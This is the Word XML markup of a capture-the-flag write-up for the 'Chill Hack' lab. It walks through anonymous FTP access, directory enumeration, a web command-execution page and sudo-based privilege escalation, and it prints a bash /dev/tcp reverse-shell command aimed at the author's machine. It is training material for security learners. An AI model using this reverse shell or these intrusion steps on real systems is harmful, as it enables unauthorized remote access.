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EEE7A" w14:textId="2951C4CC" w:rsidR="00D60B3C" w:rsidRPr="00AE10F8" w:rsidRDefault="00AE10F8" w:rsidP="00AE10F8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE10F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Chill Hack Solution Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444BB87" w14:textId="50248AC1" w:rsidR="00AE10F8" w:rsidRPr="00AE10F8" w:rsidRDefault="00AE10F8" w:rsidP="00AE10F8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE10F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Written By: Yuval Quina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F4CFE7" w14:textId="3D150455" w:rsidR="00AE10F8" w:rsidRDefault="00C777F2">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>started this challenge by executing a Nmap ports and services scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE3419" w14:textId="79FB03FC" w:rsidR="00C777F2" w:rsidRDefault="00973493">
      <w:r w:rsidRPr="00973493">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DD4C4CC" wp14:editId="568E8F77">
            <wp:extent cx="5875529" cy="4439035"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17133355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35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4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CB40" w14:textId="526370ED" w:rsidR="006212C3" w:rsidRDefault="00054D5A">
      <w:r>
        <w:t xml:space="preserve">I found </w:t>
      </w:r>
      <w:r w:rsidR="006B7294">
        <w:t xml:space="preserve">that it was possible to </w:t>
      </w:r>
      <w:r w:rsidR="000F3198">
        <w:t xml:space="preserve">access the </w:t>
      </w:r>
      <w:r w:rsidR="002D29FF">
        <w:t xml:space="preserve">fts </w:t>
      </w:r>
      <w:r w:rsidR="00386B3C">
        <w:t xml:space="preserve">service of the target </w:t>
      </w:r>
      <w:r w:rsidR="00E83405">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="00E0445A">
        <w:t>the username “Anonymous” and that it contains a txt file named “</w:t>
      </w:r>
      <w:r w:rsidR="00BE31A0">
        <w:t>note.txt”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7380791D" w14:textId="7B5AA6CE" w:rsidR="005B6548" w:rsidRDefault="00906597" w:rsidP="00B95324">
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00AA2662">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00591068">
        <w:t>info</w:t>
      </w:r>
      <w:r w:rsidR="00AC4F9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C59D3">
        <w:t>le</w:t>
      </w:r>
      <w:r w:rsidR="000C3685">
        <w:t xml:space="preserve">d me </w:t>
      </w:r>
      <w:r w:rsidR="00997924">
        <w:t xml:space="preserve">open </w:t>
      </w:r>
      <w:r w:rsidR="00734E96">
        <w:t xml:space="preserve">the note.txt file using the “ftp” </w:t>
      </w:r>
      <w:r w:rsidR="002135F5">
        <w:t>utility</w:t>
      </w:r>
      <w:r w:rsidR="00B95324">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005B6548">
        <w:t>I e</w:t>
      </w:r>
      <w:r w:rsidR="00464FF2">
        <w:t xml:space="preserve">ntered as “Anonymous” with no password </w:t>
      </w:r>
      <w:r w:rsidR="00202E09">
        <w:t>and I successfully logged in:</w:t>
      </w:r>
      <w:r w:rsidR="00B95324" w:rsidRPr="00B95324">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05404024" w14:textId="77777777" w:rsidR="00F33F3E" w:rsidRDefault="00B95324" w:rsidP="00906597">
      <w:r w:rsidRPr="000D5363">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45E2B7F9" wp14:editId="25B89C88">
            <wp:extent cx="2370025" cy="1569856"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1566386964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86964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7AA2" w14:textId="708422B7" w:rsidR="00202E09" w:rsidRDefault="00F33F3E" w:rsidP="00906597">
      <w:r>
        <w:t>And I transfer</w:t>
      </w:r>
      <w:r w:rsidR="008921D4">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00D06680">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="007F484D">
        <w:t xml:space="preserve"> txt file to my machine</w:t>
      </w:r>
      <w:r w:rsidR="000179CD">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D37C23" w:rsidRPr="00D37C23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0779A7E3" wp14:editId="4F39D79B">
            <wp:extent cx="7556500" cy="889635"/>
            <wp:effectExtent l="0" t="0" r="6350" b="5715"/>
            <wp:docPr id="13121563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563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D82C" w14:textId="6665FD41" w:rsidR="007B3EB5" w:rsidRDefault="007B3EB5" w:rsidP="00930B0F">
      <w:r>
        <w:t>And this is its content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424BEBCB" w14:textId="4443C067" w:rsidR="00930B0F" w:rsidRDefault="00A91347" w:rsidP="00930B0F">
      <w:r w:rsidRPr="00A91347">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7638FD7E" wp14:editId="0361AEF5">
            <wp:extent cx="5532599" cy="502964"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1290060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60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7A195" w14:textId="58C0EB6A" w:rsidR="005322A8" w:rsidRDefault="005322A8" w:rsidP="00930B0F">
      <w:r>
        <w:t>I read this clue</w:t>
      </w:r>
      <w:r w:rsidR="00351333">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00A25A4B">
        <w:t>kept it for later use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089A2022" w14:textId="0FA1E2EA" w:rsidR="0021502D" w:rsidRDefault="00064DE9" w:rsidP="00930B0F">
      <w:r>
        <w:t>On this point, I entered the website:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B43C42E" w14:textId="4DEDB2CE" w:rsidR="00064DE9" w:rsidRDefault="00927207" w:rsidP="00930B0F">
      <w:r w:rsidRPr="00927207">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32F168F8" wp14:editId="79B5B931">
            <wp:extent cx="7556500" cy="3533775"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="36200405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004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7051" w14:textId="1DE2C95E" w:rsidR="005C76D3" w:rsidRDefault="00DE700C" w:rsidP="005C76D3">
      <w:r>
        <w:t xml:space="preserve">I understood that this website it themed as </w:t>
      </w:r>
      <w:r w:rsidR="000D7F7A">
        <w:t xml:space="preserve">sport </w:t>
      </w:r>
      <w:r w:rsidR="003F1E2C">
        <w:t xml:space="preserve">website </w:t>
      </w:r>
      <w:r w:rsidR="006E4F0E">
        <w:t xml:space="preserve">and I started </w:t>
      </w:r>
      <w:r w:rsidR="005C76D3">
        <w:t>exploring</w:t>
      </w:r>
      <w:r w:rsidR="00794604">
        <w:t xml:space="preserve"> it.</w:t>
      </w:r>
      <w:r w:rsidR="00E41F8C">
        <w:t xml:space="preserve"> I </w:t>
      </w:r>
      <w:r w:rsidR="002E6A37">
        <w:t xml:space="preserve">run a gobuster </w:t>
      </w:r>
      <w:r w:rsidR="00514242">
        <w:t xml:space="preserve">directories </w:t>
      </w:r>
      <w:r w:rsidR="00F07A71">
        <w:t>enumeration</w:t>
      </w:r>
      <w:r w:rsidR="00F72D42">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E01B591" w14:textId="5F3C0C90" w:rsidR="00F72D42" w:rsidRDefault="00F14FBA" w:rsidP="005C76D3">
      <w:r w:rsidRPr="00F14FBA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DBAE966" wp14:editId="2698B5EA">
            <wp:extent cx="5067739" cy="4534293"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10922915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915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53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8591" w14:textId="305A964B" w:rsidR="00F57F51" w:rsidRDefault="00F57F51" w:rsidP="005C76D3">
      <w:r>
        <w:t xml:space="preserve">I found </w:t>
      </w:r>
      <w:r w:rsidR="001D134A">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00626C83">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C6743">
        <w:t>suspicious</w:t>
      </w:r>
      <w:r w:rsidR="00626C83">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002222DE">
        <w:t>directory named “</w:t>
      </w:r>
      <w:r w:rsidR="00CD67B9">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00195A74">
        <w:t>secret”</w:t>
      </w:r>
      <w:r w:rsidR="00CD67B9">
        <w:t>, so I opened it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103D1658" w14:textId="18ADDCE1" w:rsidR="00CD67B9" w:rsidRDefault="00665A04" w:rsidP="005C76D3">
      <w:r w:rsidRPr="00665A04">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60FF709D" wp14:editId="42901ED0">
            <wp:extent cx="4801016" cy="1265030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5859441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9441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2EA7" w14:textId="2792F417" w:rsidR="00A00D8D" w:rsidRDefault="006E2544" w:rsidP="005C76D3">
      <w:r>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="002926DE">
        <w:t xml:space="preserve">checked this </w:t>
      </w:r>
      <w:r w:rsidR="00ED5AFF">
        <w:t xml:space="preserve">command </w:t>
      </w:r>
      <w:r w:rsidR="009E3B59">
        <w:t xml:space="preserve">bar </w:t>
      </w:r>
      <w:r w:rsidR="004E4519">
        <w:t>with the known linux command “id”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CA9FF6" w14:textId="6183B9F4" w:rsidR="004E4519" w:rsidRDefault="002E5B28" w:rsidP="005C76D3">
      <w:r w:rsidRPr="002E5B28">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1581A40E" wp14:editId="297F5B78">
            <wp:extent cx="6344200" cy="903048"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13364883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883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44200" cy="9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8D60" w14:textId="5D0BA867" w:rsidR="002E5B28" w:rsidRDefault="002E5B28" w:rsidP="005C76D3">
      <w:r>
        <w:t>And it was found to work</w:t>
      </w:r>
      <w:r w:rsidR="007520CF">
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E40A37A" w14:textId="237E6FFC" w:rsidR="00183E71" w:rsidRDefault="00436D19" w:rsidP="00ED30D9">
      <w:r>
        <w:t>Thereafter,</w:t>
      </w:r>
      <w:r w:rsidR="00B92FB2">
        <w:t xml:space="preserve"> I </w:t>
      </w:r>
      <w:r w:rsidR="009C0816">
        <w:t>thought</w:t>
      </w:r>
      <w:r w:rsidR="00B92FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C0816">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00B92FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB59B7">
        <w:t xml:space="preserve">creating </w:t>
      </w:r>
      <w:r w:rsidR="00183E71">
        <w:t>a reverse shell over the target’s machine.</w:t>
      </w:r>
      <w:r w:rsidR="00ED30D9">
        <w:t xml:space="preserve"> In order to get it, first of all, I </w:t>
      </w:r>
      <w:r w:rsidR="0011405C">
        <w:t>established this netcat listener</w:t>
      </w:r>
      <w:r w:rsidR="000E6172">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBCC502" w14:textId="266265E0" w:rsidR="00925E5A" w:rsidRDefault="00925E5A" w:rsidP="00ED30D9">
      <w:r w:rsidRPr="00925E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27EB1745" wp14:editId="73240245">
            <wp:extent cx="1733700" cy="598222"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="631277704" name="תמונה 1" descr="תמונה שמכילה טקסט, גופן, צילום מסך, עיצו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77704" name="תמונה 1" descr="תמונה שמכילה טקסט, גופן, צילום מסך, עיצוב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700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8FDC9" w14:textId="069125A6" w:rsidR="00925E5A" w:rsidRDefault="00925E5A" w:rsidP="00ED30D9">
      <w:r>
        <w:t xml:space="preserve">Then, I tried to find which </w:t>
      </w:r>
      <w:r w:rsidR="00024D77">
        <w:t xml:space="preserve">utility can I </w:t>
      </w:r>
      <w:r w:rsidR="00B36B12">
        <w:t>use to create the reverse shell command using the “</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00B36B12" w:rsidRPr="001963B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>reverse shell generator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B36B12">
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0219D049" w14:textId="1C9971C9" w:rsidR="000E6172" w:rsidRDefault="00925E5A" w:rsidP="00ED30D9">
      <w:r w:rsidRPr="00925E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45AEF899" wp14:editId="6483D17C">
            <wp:extent cx="1969941" cy="304826"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2449794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794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69941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BC3F" w14:textId="6E595F53" w:rsidR="001963B3" w:rsidRDefault="004B774C" w:rsidP="00ED30D9">
      <w:r w:rsidRPr="004B774C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75AADEF9" wp14:editId="3738DEFC">
            <wp:extent cx="7334886" cy="5906012"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="43919663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966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34886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3CECA" w14:textId="45BDD342" w:rsidR="00494C30" w:rsidRDefault="00696490" w:rsidP="00ED30D9">
      <w:r>
        <w:t xml:space="preserve">But suddenly, I </w:t>
      </w:r>
      <w:r w:rsidR="00556D0E">
        <w:t xml:space="preserve">got this </w:t>
      </w:r>
      <w:r w:rsidR="008E6568">
        <w:t xml:space="preserve">alert </w:t>
      </w:r>
      <w:r w:rsidR="00F1788D">
        <w:t xml:space="preserve">animation </w:t>
      </w:r>
      <w:r w:rsidR="005B0FA6">
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidR="00716951">
        <w:t xml:space="preserve"> detect</w:t>
      </w:r>
      <w:r w:rsidR="00EC24C8">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00066D40">
        <w:t xml:space="preserve"> that I </w:t>
      </w:r>
      <w:r w:rsidR="001D05CE">
        <w:t xml:space="preserve">tried to </w:t>
      </w:r>
      <w:r w:rsidR="00BD0D73">
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidR="00521F75">
        <w:t xml:space="preserve">hackable </w:t>
      </w:r>
      <w:r w:rsidR="003665FD">
        <w:t>programs.</w:t>
      </w:r>
      <w:r w:rsidR="00C568BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00976504">
        <w:t>Therefore, I moved to check if python installed</w:t>
      </w:r>
      <w:r w:rsidR="00F83570">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F31BA">
        <w:t>(using “python –version”)</w:t>
      </w:r>
      <w:r w:rsidR="00556CF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F83570">
        <w:t xml:space="preserve">and the same </w:t>
      </w:r>
      <w:r w:rsidR="00245CE1">
        <w:t xml:space="preserve">message </w:t>
      </w:r>
      <w:r w:rsidR="008E6B0F">
        <w:t xml:space="preserve">showed </w:t>
      </w:r>
      <w:r w:rsidR="005C647E">
        <w:t>up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E6D0BF" w14:textId="42BE91A8" w:rsidR="005C647E" w:rsidRDefault="00FD3DB3" w:rsidP="00ED30D9">
      <w:r>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="00CE058D">
        <w:t>led me to try and execute this command (that uses “/dev/tcp”</w:t>
      </w:r>
      <w:r w:rsidR="00D3789D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E6880">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00916411">
        <w:t xml:space="preserve">create the </w:t>
      </w:r>
      <w:r w:rsidR="009C233E">
        <w:t xml:space="preserve">socket between </w:t>
      </w:r>
      <w:r w:rsidR="00F43053">
        <w:t>the target’s machine to my machine</w:t>
      </w:r>
      <w:r w:rsidR="00CE058D">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="000C2DB5">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B099C2" w14:textId="150CD752" w:rsidR="00473FD5" w:rsidRDefault="00473FD5" w:rsidP="00473FD5">
      <w:r w:rsidRPr="009567D2">
        <w:t>/bin/bash -i &gt;&amp; /dev/tcp/</w:t>
      </w:r>
      <w:r w:rsidR="000260AA">
        <w:t>_my_machine_ip_</w:t>
      </w:r>
      <w:r w:rsidRPr="009567D2">
        <w:t>/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9B35C6" w14:textId="63247596" w:rsidR="006C3183" w:rsidRDefault="006C3183" w:rsidP="00473FD5">
      <w:r>
        <w:t>Which also didn’t work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4616C522" w14:textId="52C1B832" w:rsidR="00D4702E" w:rsidRDefault="008E6A18" w:rsidP="00473FD5">
      <w:r>
        <w:t xml:space="preserve">Then, I </w:t>
      </w:r>
      <w:r w:rsidR="00045947">
        <w:t>thought</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C70E9">
        <w:t xml:space="preserve">that it </w:t>
      </w:r>
      <w:r w:rsidR="00BD55CB">
        <w:t>would</w:t>
      </w:r>
      <w:r w:rsidR="003C70E9">
        <w:t xml:space="preserve"> be</w:t>
      </w:r>
      <w:r w:rsidR="00026ED4">
        <w:t xml:space="preserve"> better </w:t>
      </w:r>
      <w:r w:rsidR="003C70E9">
        <w:t xml:space="preserve">for me </w:t>
      </w:r>
      <w:r w:rsidR="00F3598A">
        <w:t xml:space="preserve">at that time </w:t>
      </w:r>
      <w:r w:rsidR="00A243D0">
        <w:t xml:space="preserve">to try and </w:t>
      </w:r>
      <w:r w:rsidR="00FA7DB1">
        <w:t xml:space="preserve">use this limited command </w:t>
      </w:r>
      <w:r w:rsidR="004E41E7">
        <w:t xml:space="preserve">executioner </w:t>
      </w:r>
      <w:r w:rsidR="00F2686F">
        <w:t xml:space="preserve">until I can find a better way to </w:t>
      </w:r>
      <w:r w:rsidR="00045947">
        <w:t xml:space="preserve">get </w:t>
      </w:r>
      <w:r w:rsidR="000A4C12">
        <w:t>it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4747D3A7" w14:textId="4E2EDB36" w:rsidR="008C5537" w:rsidRDefault="008C5537" w:rsidP="00473FD5">
      <w:r>
        <w:t xml:space="preserve">I continued by </w:t>
      </w:r>
      <w:r w:rsidR="005D3A87">
        <w:t>examining</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the /home directory:</w:t>
      </w:r>
      <w:r w:rsidR="00E06757">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="00E06757" w:rsidRPr="00E06757">
        <w:t>cd /home; dir;</w:t>
      </w:r>
      <w:r w:rsidR="00E06757">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2F77B7" w14:textId="45E15FA6" w:rsidR="00E06757" w:rsidRDefault="00C07A4E" w:rsidP="00473FD5">
      <w:r w:rsidRPr="00C07A4E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="721F2CF5" wp14:editId="310CA20D">
            <wp:extent cx="3105419" cy="731583"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5897237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237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5419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1520" w14:textId="0F4C9B47" w:rsidR="00EB01AE" w:rsidRDefault="00EB01AE" w:rsidP="00473FD5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Here, I found </w:t>
      </w:r>
      <w:r w:rsidR="0029022E">
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="007045BC">
        <w:t xml:space="preserve">directories of 3 </w:t>
      </w:r>
      <w:r w:rsidR="00432F0C">
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidR="00547064">
        <w:t>“anurodh”, “apaar” and “aurick”</w:t>
      </w:r>
      <w:r w:rsidR="00605275">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003128AD">
        <w:t xml:space="preserve"> I </w:t>
      </w:r>
      <w:r w:rsidR="00DF0253">
        <w:t>wrote this command to explore each one of them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39669444" w14:textId="6F7B9E6C" w:rsidR="00DF0253" w:rsidRDefault="00FF1681" w:rsidP="00473FD5">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="0083743A" w:rsidRPr="0083743A">
        <w:t>echo "|anurodh:"; cd /home/anurodh; dir; echo "|apaar:"; cd /home/apaar; dir; echo "|aurick:"; cd /home/aurick; dir</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1696ECCF" w14:textId="06FA75D4" w:rsidR="00C34778" w:rsidRDefault="00C34778" w:rsidP="00473FD5">
      <w:r w:rsidRPr="00C34778">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51870960" wp14:editId="447F8D07">
            <wp:extent cx="6534716" cy="438188"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19684762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4762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4716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D894E" w14:textId="0BEF025C" w:rsidR="001A5CEE" w:rsidRDefault="002E265E" w:rsidP="009360D4">
      <w:r>
        <w:t>I saw an interesting</w:t>
      </w:r>
      <w:r w:rsidR="00864904">
        <w:t xml:space="preserve"> file named </w:t>
      </w:r>
      <w:r w:rsidR="00A93503">
        <w:t xml:space="preserve">“local.txt” in </w:t>
      </w:r>
      <w:r w:rsidR="001A5CEE">
        <w:t>/apaar directory</w:t>
      </w:r>
      <w:r w:rsidR="00DD2943">
        <w:t xml:space="preserve">. I tried to </w:t>
      </w:r>
      <w:r w:rsidR="007F3A83">
        <w:t xml:space="preserve">open it using the “cat” command but unfortunately it </w:t>
      </w:r>
      <w:r w:rsidR="00420596">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00455B21">
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidR="00D04955" w:rsidRPr="00D04955">
        <w:t>out of bounds</w:t>
      </w:r>
      <w:r w:rsidR="00C81817">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003410E4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009360D4">
        <w:t>I also tried several alternative tools but none of them worked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E22028B" w14:textId="46FEAC77" w:rsidR="00206322" w:rsidRDefault="00D53DC2" w:rsidP="0031118F">
      <w:r>
        <w:t xml:space="preserve">At this point, I </w:t>
      </w:r>
      <w:r w:rsidR="003310A4">
        <w:t xml:space="preserve">didn’t </w:t>
      </w:r>
      <w:r w:rsidR="00962389">
        <w:t>have</w:t>
      </w:r>
      <w:r w:rsidR="00CE281D">
        <w:t xml:space="preserve"> any other </w:t>
      </w:r>
      <w:r w:rsidR="00A90E18">
        <w:t>option,</w:t>
      </w:r>
      <w:r w:rsidR="00CE281D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0086486F">
        <w:t xml:space="preserve">so I </w:t>
      </w:r>
      <w:r w:rsidR="007B207A">
        <w:t>checked my sudo permissions as “www-data”</w:t>
      </w:r>
      <w:r w:rsidR="0031118F">
        <w:t xml:space="preserve"> using the command “</w:t>
      </w:r>
      <w:r w:rsidR="00530ECF">
        <w:t>sudo -l”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6B9618" w14:textId="46C6E7EE" w:rsidR="00530ECF" w:rsidRDefault="00F84BB9" w:rsidP="0031118F">
      <w:r w:rsidRPr="00F84BB9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57BC5F7D" wp14:editId="70A829EE">
            <wp:extent cx="7163421" cy="1333616"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7059184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184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163421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8321" w14:textId="1FA4D874" w:rsidR="00167EAA" w:rsidRDefault="00277BCA" w:rsidP="0031118F">
      <w:r>
        <w:t xml:space="preserve">According to my surprise, </w:t>
      </w:r>
      <w:r w:rsidR="002631F0">
        <w:t xml:space="preserve">I got permission to </w:t>
      </w:r>
      <w:r w:rsidR="00493C86">
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidR="003458EB">
        <w:t>a file named “</w:t>
      </w:r>
      <w:r w:rsidR="00735735">
        <w:t>.helpline.sh” which located on /apaar directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578C9422" w14:textId="5EE21988" w:rsidR="008C5537" w:rsidRDefault="00A8554C" w:rsidP="00F43890">
      <w:r>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00B61CDD">
        <w:t>executed it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C49B159" w14:textId="185838D4" w:rsidR="00F43890" w:rsidRDefault="00133E15" w:rsidP="00F43890">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00133E15">
        <w:t>sudo -u apaar /home/apaar/.helpline.sh</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4985011A" w14:textId="728D286F" w:rsidR="009735AA" w:rsidRDefault="00BC207C" w:rsidP="00F43890">
      <w:r w:rsidRPr="00BC207C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C550FC7" wp14:editId="564B1D08">
            <wp:extent cx="7171041" cy="731583"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20411224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224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71041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999D" w14:textId="7C724B51" w:rsidR="00FD5C36" w:rsidRDefault="00FD5C36" w:rsidP="00F43890">
      <w:r>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00305D1B">
        <w:t xml:space="preserve">read </w:t>
      </w:r>
      <w:r w:rsidR="00E65ACD">
        <w:t xml:space="preserve">it and </w:t>
      </w:r>
      <w:r w:rsidR="00562523">
        <w:t xml:space="preserve">assume that this is not the entire </w:t>
      </w:r>
      <w:r w:rsidR="00753708">
        <w:t>program.</w:t>
      </w:r>
      <w:r w:rsidR="0045252B">
        <w:t xml:space="preserve"> Therefore, I </w:t>
      </w:r>
      <w:r w:rsidR="00F85170">
        <w:t xml:space="preserve">used this </w:t>
      </w:r>
      <w:r w:rsidR="000C6DF1">
        <w:t xml:space="preserve">python </w:t>
      </w:r>
      <w:r w:rsidR="00F85170">
        <w:t xml:space="preserve">trick to </w:t>
      </w:r>
      <w:r w:rsidR="00852FC2">
        <w:t xml:space="preserve">read the .helpline.sh file: </w:t>
      </w:r>
    </w:p>
